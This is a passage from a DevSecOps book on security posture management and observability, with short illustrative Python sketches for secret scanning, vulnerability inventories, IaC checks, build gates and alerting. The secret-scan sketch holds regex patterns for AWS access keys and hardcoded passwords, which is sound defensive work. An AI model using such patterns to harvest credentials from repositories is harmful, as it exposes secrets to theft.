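```python
import re

# Sketch: a pre-commit-style secret scan over staged lines. The patterns
# are simplified examples, not a complete rule set.

SECRET_PATTERNS = {
    "aws-access-key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic-password": re.compile(r"password\s*=\s*['\"][^'\"]+['\"]", re.I),
}

def scan_diff(lines):
    """Return (rule_name, line_number) for every staged line that matches
    a secret pattern; an empty list means the commit may proceed."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for rule, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                hits.append((rule, lineno))
    return hits

staged = [
    'db_host = "db.internal"',
    'password = "hunter2"',     # would block the commit
]
findings = scan_diff(staged)
```

A hook like this fails the commit when `findings` is non-empty, which is exactly the “prevent sensitive data from being committed” behavior the text calls for.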

Why and what measures we take to secure the environment

Posture management helps in securing our DevSecOps environment. It helps in evaluating the issues that can occur in the development pipeline, and it also emphasizes monitoring applications. It’s essential to continuously audit the DevOps pipeline to identify potential vulnerabilities, misconfigurations, or human errors. Pipelines can also be measured, and automated as much as possible. This gives us a bird’s-eye view of the DevSecOps posture and the risks associated with it. Understanding this will help us understand the threats and risk exposure for the application or software.




Building the vulnerabilities inventory

An inventory of vulnerabilities – a single repository of findings, much like an artifact repository for binaries – can be a gold mine. Vulnerabilities from all sources need to be kept in one place for better tracking.

Addressing vulnerabilities

It is important to fix vulnerabilities; if we do not fix them, there is no point in building a list of them. A lot of people have asked me how they should address a huge pile of security issues, and ownership is also a big challenge. The simple mantra is to bring all the teams together and start assigning ownership. Start with the Sec team, helping them triage the severity or priority of vulnerabilities, and then help the Dev team fix those vulnerabilities based on their priority.
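Bringing the inventory and ownership ideas together, this hypothetical Python sketch merges findings from several scanner sources into one list, attaches an owner to each component, and sorts the backlog by severity so the highest-priority items surface first. The source names, components, and team names are all invented for illustration.

```python
# Sketch: aggregate vulnerabilities from several scanner sources into one
# inventory, assign an owner per component, and order by severity so the
# Dev team fixes the highest-priority items first.

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}

def build_inventory(sources, owners):
    """Merge findings from all sources into one list, attach an owner
    to each, and sort by severity (most severe first)."""
    inventory = []
    for source, findings in sources.items():
        for component, severity in findings:
            inventory.append({
                "source": source,
                "component": component,
                "severity": severity,
                "owner": owners.get(component, "unassigned"),
            })
    inventory.sort(key=lambda f: SEVERITY_RANK[f["severity"]])
    return inventory

sources = {
    "sast": [("auth-service", "high")],
    "sca": [("payments", "critical"), ("auth-service", "low")],
}
owners = {"auth-service": "team-identity", "payments": "team-billing"}
inventory = build_inventory(sources, owners)
```

Anything that falls through to "unassigned" is an immediate signal that the ownership conversation described above still needs to happen for that component.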

Parameters to define the security posture

The DevSecOps landscape continues to grow because of new technologies in containers, data storage services, and API gateways. We can’t use a single evaluation criterion to effectively measure the security posture of an environment. We need multiple mechanisms to evaluate and measure the posture, and to do this, we need to gather the right amount of data.

Discovering the third-party component

What should you do if you discover issues in third-party components? For example, what happens when you rely on a vendor, or when there is no patch or update available?

Measuring the effectiveness of the technologies used

We can adopt as many technologies as we like. However, measuring their usefulness is a key area of DevSecOps. Often, organizations buy a tool simply because it’s the talk of the town. This becomes a disaster if it doesn’t match what we need. Measuring effectiveness also clarifies what a tool actually is and how it performs.

Managing workflows

You must automate the DevSecOps pipeline to understand where things can go wrong and how to fix them early on. This will help ensure you have a sustainable DevSecOps program.

There are multiple measures that we can take for our cloud environment to monitor its usage, resources, and security practices. This will enhance the way we take care of our cloud environment. Let’s look at some of the practices that pave the way toward successfully monitoring an environment.


What measures can we take to monitor an environment?

Mapping posture management to the organization’s strategy involves integrating security considerations and measures into the broader strategic planning and execution process within the organization.

Think of your organization as a castle. The organization’s strategy is like the blueprint for building and expanding the castle, while security posture management is like the plans for the castle’s defenses – its walls, gates, guards, and watchtowers. Just as a castle’s defenses need to be built with its layout and expansion plans in mind, your organization’s security measures need to be aligned with its strategic objectives.

This means that when you’re laying out the strategy for your organization – maybe you’re planning to launch a new online service, or you’re looking to store more customer data – you need to consider how these moves will impact your security. For instance, the new online service could be a new point of vulnerability that attackers might exploit, so you’d need to strengthen your security posture to defend it.

Mapping posture management to the organization’s strategy is about striking a balance. You want to be innovative and drive your organization forward, but not at the expense of exposing it to undue risk. It’s about weaving security into the fabric of your strategic plans so that it becomes a natural part of your organization’s growth and evolution. By doing this, you’re not just bolstering your organization’s defenses; you’re also showing your stakeholders – be it customers, partners, or regulators – that you take security seriously and that you’re committed to protecting the data and trust they’ve placed in you. And in today’s digital world, that’s a pretty solid strategic move in itself.

A positive way toward the cloud-native world

Cloud-native environments are the way to go. All the code for environments is hosted in the cloud. The velocity of pushing code to the cloud has increased manyfold, which itself implies that we cannot compromise on the security posture of development pipelines. While moving to the cloud, going in with the mindset that we need to keep our environments secure and compliant gives us an edge; cutting corners here can lead to big disasters. To promote risk ownership and accountability, we must obtain the most detailed and comprehensive visibility possible in terms of people, processes, technology, and cloud architecture.

Cloud-native architectures

Architecting the cloud right is as important as setting up things in-house. Cloud transformation is increasingly being discussed across all corporate environments. We can be sure that almost any organization was either born in the cloud, is currently undergoing a cloud transformation, or is at the very least thinking about undergoing one.


Understanding the Security Posture

These transformations frequently go hand in hand with DevSecOps software delivery. While we leverage these technologies, it is imperative to secure and architect them well. The complexity of assessing our security posture is increased by both the delivery model and the cloud-native technologies used.

Provisioning and configuring infrastructure

Infrastructure as Code (IaC) principles are fundamental to modern infrastructure management, but they must be implemented securely. Unfortunately, a lot of organizations do not understand the importance of securing infrastructure code, and this has become a big concern for businesses. Instead of automated checks, the code is often reviewed manually, and it is frequently poorly written and difficult to grasp. Retail giants, especially during sales, may scale their environments using IaC, which emphasizes the need for secure IaC practices. If the code is not secure, we have vulnerabilities from the get-go.
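To make this concrete, here is a minimal, hypothetical sketch of an automated IaC policy check. The resource format and the two rules are illustrative assumptions, not a real scanner’s API; in practice, you would wire a dedicated IaC scanning tool into the pipeline.

```python
# Hypothetical sketch: a minimal IaC policy check over parsed resource
# definitions. The resource shape and rules are illustrative only.

def check_iac_resources(resources):
    """Return a list of (name, issue) findings for insecure settings."""
    findings = []
    for res in resources:
        # Flag storage buckets that are not encrypted at rest
        if res.get("type") == "bucket" and not res.get("encrypted", False):
            findings.append((res["name"], "bucket not encrypted at rest"))
        # Flag firewall rules open to the whole internet
        if res.get("type") == "firewall" and "0.0.0.0/0" in res.get("allowed_cidrs", []):
            findings.append((res["name"], "firewall open to 0.0.0.0/0"))
    return findings

resources = [
    {"name": "logs-bucket", "type": "bucket", "encrypted": False},
    {"name": "admin-fw", "type": "firewall", "allowed_cidrs": ["0.0.0.0/0"]},
    {"name": "data-bucket", "type": "bucket", "encrypted": True},
]

for name, issue in check_iac_resources(resources):
    print(f"INSECURE: {name}: {issue}")
```

Running such a check on every commit catches the “vulnerabilities from the get-go” before the environment is ever provisioned.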

Automating controls

Automation, combined with the right tools and collaboration, enhances vulnerability detection and remediation in the DevSecOps life cycle. Tools should help in gathering information about third-party libraries so that we can track open source components. All too often, security takes the back seat in the fast-paced world of technology and business. It’s like the seatbelts in our cars – we know they’re important, we know they can save us from a whole lot of trouble, but sometimes, we only remember to buckle up after we’ve hit a bump or seen a close call. Just think about it: how many times have we heard of a major company experiencing a data breach, only for it to beef up its security measures afterward? This reactive approach to security is like closing the barn door after the horse has bolted. Only after a breach do a lot of organizations start taking it seriously. Enforcing the right policies on infrastructure as code is equally important. Automation can tremendously reduce the cost of finding vulnerabilities, and it helps in gaining the confidence and buy-in of the developer and testing teams for static application security testing (SAST), software composition analysis (SCA), dynamic application security testing (DAST), penetration testing, and more.
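One common automated control is a security gate that fails the build when scanner findings exceed a severity bar. The following is a hedged sketch: the normalized finding format and field names are assumptions for illustration, since each SAST/SCA/DAST tool emits its own schema.

```python
# Hypothetical sketch: a pipeline security gate over normalized findings.
# The dict fields ("tool", "rule", "severity") are illustrative assumptions.

def gate_build(findings, blocking_severities=("critical", "high")):
    """Fail the build if any finding is at a blocking severity."""
    blocking = [f for f in findings if f["severity"] in blocking_severities]
    return len(blocking) == 0, blocking

findings = [
    {"tool": "sast", "rule": "sql-injection", "severity": "high"},
    {"tool": "sca", "rule": "outdated-library", "severity": "medium"},
]

passed, blockers = gate_build(findings)
print("build passed" if passed else f"build blocked by {len(blockers)} finding(s)")
```

Gating on severity rather than on raw finding counts keeps the fast feedback loop while still letting medium and low findings flow into the backlog.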

Securing the toolchains

Securing the tools used in the DevSecOps pipeline is as crucial as securing the pipeline itself. When we are building software, we do not want it to break due to toolchain issues. An insecure toolchain is like having a thief sitting next to you while you tell them all your secrets; you are making vulnerable software from the start.

Where does security stand in the whole development process?

Any unaddressed vulnerability can be exploited, emphasizing the need for proactive security measures in the DevSecOps process. Attaining a 360-degree posture means asking questions about the following aspects:

• What dependencies do they have?
• Are they internal or exposed applications?
• Are all stakeholders involved?
• Who has ownership of the data and its vulnerabilities?
• What code commits and repositories are available?

Compliance and audit

Compliance is one area that needs to be treated with the utmost importance. It brings together all the technologies and stitches together the pieces that can be missed if they’re not considered. Compliance has always been something we must address to be in the market or to show we are on par with it. A unified view of the environments, roles, and susceptibilities, alongside meeting the right compliance requirements, is important. The same approach should be followed by all teams: any time a finding needs evidence, the team should support that and provide the relevant data. The security posture should be evaluated regularly against important compliance standards, including the Health Insurance Portability and Accountability Act (HIPAA), Health Information Trust Alliance (HITRUST), the Open Worldwide Application Security Project (OWASP), the Payment Card Industry Data Security Standard (PCI DSS), National Institute of Standards and Technology (NIST) guidelines, Service Organization Control 2 (SOC 2), and others.

Multi-cloud security

AWS, Azure, IBM Cloud, and GCP are some of the most well-known and most-used cloud service providers on the market. It is imperative to have a clear picture and integration of the services we are using in our environment, as we cannot secure what we’re unaware of. As per a 2021 Ponemon Institute research report, misconfiguration is one of the biggest challenges in cloud environments, and addressing it is part of the DevSecOps process. We must ensure that every product team creates cloud applications with security integrated:


Figure 3.1 – Multi-cloud environment

Monitoring

As much as we are automating the DevSecOps process, automating monitoring and incident generation is equally important. Monitoring should be done at all stages to make sure we can detect failures and act on them. Without monitoring, we can never act upon issues. We also need a proper inventory of applications and their components so that we can address security gaps.
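The automated “monitoring plus incident generation” loop can be sketched as a simple threshold evaluation. The metric names and limits below are illustrative assumptions; real deployments would pull samples from a monitoring backend rather than a dict.

```python
# Hypothetical sketch: automated incident generation from metric samples.
# Metric names and threshold values are illustrative assumptions.

def evaluate_metrics(samples, thresholds):
    """Compare each metric sample against its threshold and emit incidents."""
    incidents = []
    for metric, value in samples.items():
        limit = thresholds.get(metric)
        if limit is not None and value > limit:
            incidents.append({"metric": metric, "value": value, "limit": limit})
    return incidents

thresholds = {"error_rate": 0.05, "p95_latency_ms": 500}
samples = {"error_rate": 0.12, "p95_latency_ms": 180, "cpu_pct": 40}

for incident in evaluate_metrics(samples, thresholds):
    print(f"incident: {incident['metric']}={incident['value']} (limit {incident['limit']})")
```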

Incident response

Incident response should be triggered as soon as issues are detected, and we can get help from serverless components, such as Lambda functions, to automate the response. Responding to incidents at the right time gives us the power to understand our environments. There must be proper documentation on how to respond to an incident.
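As a sketch of what such an automated responder might look like, here is a hypothetical Lambda-style handler. The event fields and action names are assumptions for illustration; a real function would call your paging, isolation, and ticketing APIs.

```python
# Hypothetical sketch: a Lambda-style entry point for automated incident
# response. Event fields and action names are illustrative assumptions.

def handle_incident(event, context=None):
    severity = event.get("severity", "low")
    actions = []
    if severity in ("high", "critical"):
        # High-severity incidents page a human and contain the blast radius
        actions += ["page-oncall", "isolate-affected-host"]
    # Every incident is tracked, whatever the severity
    actions.append("open-ticket")
    return {"incident_id": event.get("id"), "actions": actions}

result = handle_incident({"id": "INC-42", "severity": "critical", "source": "ids"})
print(result["actions"])
```

Encoding the response playbook as code like this doubles as the “proper documentation” the text calls for: the runbook and the automation are the same artifact.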

Developer tools

Developers need to be enabled, and they must be able to collaborate with the security team. The security team should also speak the developers’ language when reporting its findings so that developers understand them. This completes the cycle and ensures vulnerabilities are acted upon more reliably. It also reduces the security issues that result from misses or miscommunication.

Vulnerability management

Someone rightly said, “Any vulnerability can become an exploit or a breach without warning.” There is no rule that a vulnerability must be detected before it can be weaponized. Anyone can play around with weaknesses in the system. Let’s look at some pointers around how vulnerability management can help.

Vulnerability management helps with the following aspects:

• Understanding risk matrices and assurance checks in the pipeline, and reducing the reliance of security on runtime tools, security checks, and manual code reviews
• Finding vulnerabilities not just in in-house code but also in open source software (OSS), open source libraries, dependencies, containers, and IaC configuration
• Automating the DevOps process and the actions triggered by vulnerabilities, reducing the time development teams spend finding and fixing security issues

Knowing about every component we use, learning about new issues, vulnerabilities, and alerts, and figuring out how they need to be addressed are all part of security posture management.
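A core vulnerability management activity is remediation prioritization. The sketch below ranks findings by a weighted risk score; the weighting scheme is an illustrative assumption, not a standard formula, though real programs similarly combine CVSS with exploitability and exposure data.

```python
# Hypothetical sketch: ranking vulnerabilities for remediation.
# The extra weights for exposure and exploit availability are
# illustrative assumptions, not a standard scoring model.

def prioritize(vulns):
    def risk(v):
        score = v.get("cvss", 0.0)
        if v.get("internet_facing"):
            score += 1.5   # exposed services are easier to reach
        if v.get("exploit_available"):
            score += 2.0   # a known exploit raises urgency
        return score
    return sorted(vulns, key=risk, reverse=True)

vulns = [
    {"id": "CVE-A", "cvss": 9.1, "internet_facing": False, "exploit_available": False},
    {"id": "CVE-B", "cvss": 7.0, "internet_facing": True, "exploit_available": True},
]

print([v["id"] for v in prioritize(vulns)])
```

Note how the lower-CVSS finding can still rank first once exposure and exploitability are factored in, which matches the point above: a vulnerability does not have to look severe on paper to be weaponized.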

Summary

Wrapping up this chapter, let’s take a step back and look at the big picture. When we talk about security posture management, it’s not just some technical jargon that’s reserved for the IT department. No, it’s much more than that – it’s about the safety and integrity of the whole organization in this digital age, where threats could emerge from any corner of the internet.

What we’ve learned from this chapter is that security posture management is like an ongoing journey, not a destination. It’s not something you set and forget. It’s a continuous commitment that needs consistent attention, effort, and resources. You can’t just check a few boxes, install some software, and call it a day.

Let’s revisit the main stages of this journey: risk management, vulnerability management, creating sound security policies, and staying vigilant through continuous monitoring. All of these steps weave together to form a protective net around our valuable data and systems. Think of risk and vulnerability management as our eyes and ears on the ground. They help us spot trouble before it finds us. Security policies are our game plan, guiding us on what to do and when to do it. And continuous monitoring? That’s our ever-watchful guardian, keeping an eye on things at all times.

But the tech side is just half the story. The human element is equally crucial. To manage our security posture effectively, we need to make sure everyone in our organization understands the importance of security. Regular training sessions, audits, and tests aren’t just bureaucratic red tape; they’re our team drills, keeping us prepared and ready to act.

In essence, this chapter circles back to one thing: security posture management is crucial for every organization. It’s a shield we need to maintain diligently to protect our data, uphold our reputation, and ensure we can keep doing what we do without disruption. So, let’s not take it lightly; in the face of cyber threats, a strong security posture is our best defense.


4

Understanding Observability

Observability, in the context of DevOps, refers to the capacity to track and analyze important data, such as system performance, resource consumption, and error rates, to spot possible issues and raise the system’s overall stability and reliability. Observability can be thought of as insights into the metrics, traces, and logs of a microservices architecture’s implementation environment. Some claim that observability is more akin to continuously monitoring various pipeline components to maintain compliance, checking metrics continuously for vulnerabilities based on a risk level, and more.

There’s one thing to remember: observability is not to be confused with monitoring or application performance monitoring. These are separate things to be considered. Observability cannot circumvent or replace the need for monitoring. Monitoring is a subset of observability – it watches for the failure modes you already know about, while observability helps you explore the ones you don’t.

In this chapter, we will cover the following topics:

• Why do we need observability?
• The key functions of observability
• Linking observability with monitoring
• Exploring the monitoring process
• Implementing observability with monitoring
• Challenges around observability
• Making organizations observable

Why do we need observability?

Observability, or the capacity to comprehend what is happening within a system, is very helpful for an organization. A lot of the discussion around observability assumes that the site reliability engineering (SRE) team takes care of it, but it helps everyone understand the systems and applications and provides context around the modern applications that we have. It provides information about what needs to


be tested and why it needs to be tested. This, in turn, helps in improving the system’s performance and quality and bringing teams together.

A lot of times, when an issue arises, it is very difficult to figure out where things went south with traditional methods. We keep looking at logs with no real results and hit a dead end. Production issues are very common. Observability helps by separating the different aspects of logs and providing meaningful insights. Observability is not new and is an integral part of the ecosystem; when set up correctly, it provides insights into issues, identifies them early on, and helps the organization resolve them. Output says a lot about a system’s performance, which can also be checked through observability. Better observability provides quicker insights about any issues in the system.

For example, as we modernize our environments and shift our workloads to the cloud, there may be downtimes; however, if we have set up observability right, it is easier and quicker to detect any issues or downtimes. You would also be able to figure out any performance-level concerns and the reasons behind them. We must also collaborate across different environments by keeping track of all the assets, monitoring them, and fixing any possible issues to make sure they meet the business needs.

Observability gives quicker insights into issues that exist, even when we have no idea they exist. Especially when we are moving toward the cloud, there are many issues we tend not to know about, since the cloud is so vast. Here, observability takes the front seat and provides holistic information about systems.

The key functions of observability

Observability has three main pillars of success when it comes to finding and gaining measurements: logs, metrics, and tracing. Raw telemetry data from backend applications can be observed; however, it might not give us the complete picture of the systems that are operating in the backend. We need to understand the frontend application data as well as the backend application data to get a complete view of application performance. These three pillars can be extended. Let’s take a look:

• Logs: Logs are generated from any activity that occurs in systems and applications (when configured properly). Logs can be in plain text or in structured or unstructured form. Logs contain the minutest details about event activities, including timestamps and the context behind them.
• Metrics: Metrics define the statistics and criteria to measure aspects of an application. These could be based on the network, hardware, or infrastructure. They can also gather information about when an application can go down, the capacity of the system, and when there is a huge amount of traffic. They define the behavior of the application.
• Tracing: Tracing helps in figuring out the flow of data, from the user to the backend. For example, it can show how the user makes a request and the backend provides the necessary information.
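The three pillars can be seen in a single structured record. The sketch below is illustrative: the field names are assumptions, and real systems typically use dedicated logging, metrics, and tracing libraries rather than hand-rolled JSON, but it shows how one emitted record can carry a log event, metric values, and a trace ID that correlates the steps of a request.

```python
import json
import time
import uuid

# Hypothetical sketch of one structured record carrying all three pillars.
def emit(event, trace_id, **metrics):
    record = {
        "ts": time.time(),      # timestamp and context -> the log pillar
        "event": event,
        "trace_id": trace_id,   # correlates steps of one request -> tracing
        "metrics": metrics,     # numeric measurements -> metrics
    }
    print(json.dumps(record))
    return record

trace_id = uuid.uuid4().hex     # one ID follows the request end to end
emit("checkout.requested", trace_id, latency_ms=42, items_in_cart=3)
emit("checkout.completed", trace_id, latency_ms=17)
```

Because both records share the same `trace_id`, a backend can reassemble the request’s journey, while the embedded numbers feed dashboards and the event names feed log search.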

All three pillars are essential to observability, but each has restrictions that need to be paid attention to:

• Metrics can be complex to categorize and sort, making them difficult to utilize for troubleshooting; sorting and aggregating logs to derive useful conclusions or relationships can be difficult; and traces can generate colossal volumes of pointless data
• Consequently, observability practitioners may still run into obstacles to gaining true insight, feel there are too many locations to look for problems, or struggle to drill down to turn concerns into problems that can be addressed

All of this helps in turning a bad user experience into a great one. Observability adds the user’s perspective on application usage to the traditional way of working. This can all be tested in pre-production environments. It is imperative to keep track of third-party components and dependencies to check for code-level issues as well. Once all the data has been gathered from logs, metrics, tracing, dependencies, and more, observability provides contextual information to the different teams involved in the DevOps processes. Observability can throw light on these three pillars and specify the where, why, and what of any event that can point to, cause, or be used to address a system issue with an application, or generate deeper information.

Network observability systems use methods similar to application observability, wherein information is gathered on the network. Here, the data involves logs from network devices such as switches, routers, or firewalls. They provide deep-level information about the network. They also provide network performance information, which can be correlated with application-level data. SRE teams ensure that application performance is handled properly, with DevOps being center stage.

Observability tools have a lot to offer when we talk about providing tons of features based on the environment’s needs.
However, some common functionalities are used by organizations:

• Visualize data and associated analytics in customized real-time dashboards
• Produce native data, either using agents or without
• Effectively store and retrieve massive amounts of data
• Deliver meaningful reports, forecast long-term trends, and issue severity warnings
• Ingest data generated by other monitoring mechanisms
• Process vast volumes of diverse data to produce relevant insights

Observability also ensures the following:

• Modern cloud environments have a safer connection with in-house environments
• APIs and microservices are tested for any possible availability issues
• Application testing is performed to test for any possible security flaws
• Business risks are tested for


Finally, observability tools help organizations make the right decisions around data sources, as well as any monetary constraints.

Linking observability with monitoring

Linking observability with monitoring involves establishing a strong connection between the two concepts to enhance system understanding and performance. Observability provides a holistic approach to system visibility, while monitoring focuses on collecting and analyzing data for specific metrics and events. By linking observability with monitoring, organizations can achieve the following:

• Comprehensive system insights
• Proactive issue detection
• Contextual analysis
• Improved troubleshooting and debugging
• Scalability and performance optimization
• Enhanced incident response

Exploring the monitoring process

Monitoring is the process of checking for data from known sources and analyzing it. It helps teams have a better understanding of their assets. With monitoring, the rules for capturing logs from the network or applications are pre-defined. Within an organization, some people monitor assets for specific logs, based on defined metrics, to look for any events or incidents and gain meaningful information from the raw logs. There could be known signatures or specific messages that have been generated, all of which will be actionable. With monitoring, we can figure out any changes that are not supposed to happen or are abnormal, such as any activity leading to a spike in events or authentication failures.

Monitoring is one of the key elements of understanding any changes in a system’s environment. Monitoring teams create dashboards with pre-configured rules, which help with alerting in case of any changes in the rules or the environment. There is a chance of missing some events if there are enormous numbers of false events, so it is important to set up and configure the monitoring tools correctly. Monitoring is done in passive mode to help with investigation at a later stage, which may also be overwhelming. Logs, events, asset databases, microservices, and application programming interfaces (APIs) are a few examples of the sources that are used in monitoring to acquire the information needed. With monitoring, we might also miss certain aspects precisely because we’re so well acquainted with the infrastructure.

Observability and monitoring may sound different and similar at the same time; they are complementary. Monitoring helps in getting to know about issues in known systems, whereas observability provides contextual information about issues that exist but are not yet known.
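A pre-defined monitoring rule of the kind described above can be sketched as follows. The event shape and the threshold of five failures are illustrative assumptions; a real rule would run over a sliding time window in a monitoring system.

```python
from collections import Counter

# Hypothetical sketch: a pre-defined rule that flags an abnormal spike in
# authentication failures per user. Event shape and limit are assumptions.

def auth_failure_spikes(events, limit=5):
    """Return the users whose auth-failure count exceeds the limit."""
    failures = Counter(
        e["user"] for e in events if e["type"] == "auth_failure"
    )
    return sorted(user for user, count in failures.items() if count > limit)

events = (
    [{"type": "auth_failure", "user": "mallory"}] * 7
    + [{"type": "auth_failure", "user": "alice"}] * 2
    + [{"type": "login_ok", "user": "bob"}]
)

print(auth_failure_spikes(events))
```

This is monitoring in its pure form: the rule only catches what we already knew to look for, which is exactly the gap that observability’s contextual data fills.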


With growing needs and huge, complex environments, multiple possibilities exist that might confuse us and leave us not knowing what to look for, with what tool, and why only that specific item or data source needs to be checked. It is of the utmost importance to build the right context on what, why, and how things need to be monitored. The systems under observability, also known as observable systems, provide the right dataset across the environments. This could be in the form of performance data, speed, velocity, or events. All of this can be correlated and aggregated in real time to build an accurate set of information that can be understood alongside the user data. Another interesting area of observability is tagging, which helps in mapping applications, networks, and data to meaningful information and insights.

System information should not be constrained or limited to the team that is monitoring. With the evolution of the DevOps era, it is of the utmost importance that SREs, developers, and testers have insights into the information related to the systems, which will enable them to drive decisions about performance and enhance system performance. This, in turn, will lead to stable environments that can be debugged with less downtime and fewer outages. For example, monitoring can easily be done on a smaller set of data sources or smaller environments, covering system usage, CPU utilization, and any changes in the environment. However, for bigger or enterprise setups, it is good to correlate different datasets and understand what’s happening within the environments. It is good to have observability in smaller environments as well.

The assumption behind observability is that data sources will contribute to planning the nature, timing, and auditing procedures of the system, which will then accurately reflect the state of an application or system. Observability, when combined with monitoring, is like the classic match of salt and pepper.

Implementing observability with monitoring

To implement observability with monitoring, a thorough system must be set up to collect, examine, and interpret pertinent data to understand system behavior, performance, and problems. Choosing the best monitoring tools and setting your objectives are the first steps in the process. Instrumentation is put in place after the crucial measurements, logs, and events have been identified. Centralized data collection, storage, analysis, and visualization are performed before the data is presented in a human-readable format. Based on comments and insights, continual improvement is pursued, and alerting and notification mechanisms are created. Observability and monitoring are further improved as incident response procedures and setup documents are integrated into them. Here are some things to consider:

• Measure any downtimes or indicators that provide information about any possible outages
• Implement systems that can detect any possible issue leading to outages or bugs early on
• Detect unauthorized activities early on
• Based on the system’s information, make forecasts or plan for a system’s performance
• Detect any possible changes in the environment
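The collect-centrally-then-evaluate loop described above can be sketched in a few lines. The in-memory lists below are stand-ins (assumptions for illustration); a real implementation would use a time-series store and a notification service.

```python
# Hypothetical sketch: instrument, collect centrally, evaluate, alert.
# The storage and alert channel are in-memory stand-ins.

class ObservabilityPipeline:
    def __init__(self, error_rate_limit=0.05):
        self.error_rate_limit = error_rate_limit
        self.store = []    # centralized storage stand-in
        self.alerts = []   # notification channel stand-in

    def ingest(self, record):
        """Collect a record centrally, then evaluate alerting rules."""
        self.store.append(record)
        if record.get("error_rate", 0.0) > self.error_rate_limit:
            self.alerts.append(
                f"{record['service']}: error rate {record['error_rate']:.0%}"
            )

pipeline = ObservabilityPipeline()
pipeline.ingest({"service": "checkout", "error_rate": 0.12})
pipeline.ingest({"service": "search", "error_rate": 0.01})
print(pipeline.alerts)
```

Keeping every record in the central store, not just the alerting ones, is the design choice that enables later exploration of issues you did not know to alert on.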


With observability and monitoring, it is easier to get the absolute data, which can help in figuring out underlying issues and root causes to fix the problems at hand. At the same time, it can help us avoid similar issues in the future. Observable environments are meant to help us figure out patterns and similar issues for future reference.

Effective monitoring and observability implementation depends on several factors. Before too much damage is done, your monitoring should inform you of what is broken and assist you in understanding why. Time-to-restore (TTR) is a crucial measure in the event of an outage or a deterioration in service. The capacity to quickly identify what went wrong, and the quickest route to resuming service, is a critical factor in TTR.

DevOps’s popularity has changed the software development life cycle (SDLC). Monitoring is increasingly used to increase the observability of the system rather than simply collecting and analyzing log data, measurements, and distributed event traces. Therefore, the development segment is included in the realm of observability, which is greatly facilitated by the SDLC pipeline’s individual methods and technologies. It also helps the team spot possible problems in systems before they have an impact on end users and can be further improved by continuous iteration based on performance feedback. Developers, testers, the Ops team, and SREs gain enhanced agility from observability’s actionable intelligence for performance optimization, staying ahead of any potential service deterioration or failures. In addition to technologies, observability describes the strategy, organizational characteristics, and priorities used to achieve the proper observability goals and, as a consequence, the value of monitoring activities.
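TTR itself is a simple measurement once incidents are recorded with detection and restoration timestamps. The record layout below is an illustrative assumption:

```python
from datetime import datetime, timedelta

# Hypothetical sketch: computing mean time-to-restore (TTR) from incident
# records. The record layout is an illustrative assumption.

def mean_ttr(incidents):
    """Average time between detection and restoration, as a timedelta."""
    durations = [i["restored_at"] - i["detected_at"] for i in incidents]
    return sum(durations, timedelta()) / len(durations)

incidents = [
    {"detected_at": datetime(2023, 5, 1, 10, 0), "restored_at": datetime(2023, 5, 1, 10, 45)},
    {"detected_at": datetime(2023, 5, 3, 9, 0), "restored_at": datetime(2023, 5, 3, 9, 15)},
]

print(mean_ttr(incidents))
```

Tracking this number over time shows whether your observability investments are actually shortening the route back to service.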

Challenges around observability

Everything has pros and cons, and observability is no different. Observability has certain challenges while taking care of infrastructure, applications, and the networks behind them. The organization must deal with these issues, which can be challenging. Cloud systems generate a substantially higher amount of telemetry data, especially when microservices, APIs, and containerized applications are involved. This data is humongous for teams to handle at the speed it is generated at. The information flow may pose certain observability issues:

• False negatives or accidental invisibility: Incorrectly mapping or misconfiguring data sources might mean not getting the right visibility or observability around the system, which would lead to issues and bugs being missed during analysis.
• Improper data: Failing to collect the right information from the data sources means that the picture of the system built from the data flows is not accurate, which leads to observability issues.
• Acquiring information in the correct format: Different systems generate data logs in various formats, and if data aggregation is not done correctly or unsupported formats are encountered, important information may be missed. It is crucial to ensure that the data is collected and processed in a standardized and compatible format to avoid data loss or misinterpretation.


• Data fragmentation and complexity: Understanding the interdependencies between applications, multiple cloud platforms, and various digital channels such as the web, mobile, and IoT can be challenging due to the presence of different agents, diverse data sources, and monitoring tools that operate in isolated environments. This fragmentation makes it difficult to gain a holistic view of the system and identify correlations and potential issues across different components.
• Navigating complex environments: In modern cloud environments that are continuously evolving, finding solutions amid the enormous volume of raw data generated by each component can be highly demanding. This complexity is further amplified with technologies such as Kubernetes and containers, which rapidly spin up and down, introducing additional data streams that need to be effectively managed and analyzed.
• Reducing dependency on manual intervention: When IT workers are required to manually instrument and modify code for every new type of component or agent, a significant portion of their time is consumed in setting up observability rather than utilizing insights from observability data to drive innovation. Automating these processes and establishing standardized practices can free up valuable resources and enable more focus on deriving meaningful insights from observability data.
• Potential to log sensitive data in cleartext: Observability tooling might log sensitive information in cleartext, which can be troublesome.
• Creating proper testing and pre-production environments: Even with load testing conducted in pre-production, developers often lack a suitable means of observing and comprehending how real users would interact with applications and infrastructure before deploying the code into production. Establishing dedicated test playgrounds or pre-production environments that simulate real-world conditions can provide developers with valuable insights into the performance and behavior of their systems, leading to more robust and reliable deployments.

Making organizations observable

The first step toward making an organization observable is ensuring that its thought process involves observability. Cloud systems are complex, with enormous amounts of data that need to be ingested from systems, applications, and the network. This data is needed for accurate analytics so that actions or actionable insights can follow. It would be hard to get greater insights from observable systems if we don’t gather the data in the right formats. It is of the utmost importance to have meaningful output. Various steps can be followed to set up observability or make data observable:

• Establish observability objectives: Recognize what is being observed, why, and what advantages the firm hopes to gain from observability.
• Properly configure outputs: Set up dashboards, alerting, and reporting to produce results that are useful and actionable. Consider configuring temporal parameters that forgo an alert if the parameter returns to normal within a specific amount of time, as opposed to setting static alerting thresholds.
47

48

Understanding Observability

• Perform data curation for observability: Don’t waste time generating or ingesting data that is not pertinent to the specified aims. Review your data sources and think about adding context or changing the way data is collected to improve observability, such as adding information to logs. For easier trend detection in a time series, certain data may be aggregated or rolled up.
• Look for results that can be put into practice: Look for useful data to develop actionable outputs, such as user effects on services and applications, as details are readily lost in the cacophony of daily operations.

The benefit of observability can be summed up as follows: all other factors being equal, a more observable system is easier to understand (both broadly and in great detail), monitor, update, and fix than a less observable one. More specifically, observability helps an organization achieve the Agile/DevOps/SRE goals of providing better software more quickly by enabling it to do the following:

• Improve the system’s performance
• Find bugs early on
• Enhance the user experience
• Bring teams together
• Enhance the availability of systems
• Reduce the operational cost
• Figure out and measure relevant information
• Find critical and high-severity vulnerabilities so that they can be mitigated early on
• Find and fix misconfigurations
• Discover hidden unknowns
• Test the impact on the end user experience
• Automatically fix issues and perform remediation
